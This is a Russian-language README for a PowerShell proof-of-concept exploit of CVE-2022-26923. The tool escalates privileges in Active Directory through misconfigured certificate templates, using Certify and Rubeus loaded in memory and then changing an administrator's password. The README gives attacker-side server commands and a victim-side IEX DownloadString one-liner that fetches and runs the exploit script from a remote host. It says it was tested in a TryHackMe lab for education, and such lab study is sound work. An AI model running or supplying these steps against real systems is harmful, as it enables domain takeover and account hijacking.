CVE-2022-26923-Powershell-POC
Powershell POC для загрузки и автоматического запуска Certify и Rubeus из памяти.
Как это работает?
- Загружает Certify.exe и Rubeus.exe в память.
- Сканирует целевую машину на наличие неправильно настроенных шаблонов сертификатов. (подробнее на https://www.youtube.com/watch?v=HBRCI5O35R8)
- Запрашивает сертификат для административного пользователя на основе уязвимого шаблона.
- Отправляет сертификат обработчику сертификатов, который преобразует его в формат .pfx и отправляет обратно клиенту.
- Использует Rubeus для загрузки сертификата и создания билета для административного пользователя.
- Меняет пароль административного пользователя. (Только для демонстрации)
POC протестирован в следующих лабораториях TryHackMe: https://tryhackme.com/room/adcertificatetemplates
Эта CVE используется для повышения привилегий, поэтому в данной демонстрации, а также в лаборатории THM, не рассматривается начальная эксплуатация.
Шаги:
- python3 -m http.server 80 [Машина атакующего]
- python3 uploader.py 8000 [Машина атакующего]
- IEX(New-Object Net.WebClient).DownloadString('http://IP/poc.ps1') [Машина жертвы]
Примечание: Данный POC предназначен для образовательных целей, вы несете ответственность за свои действия.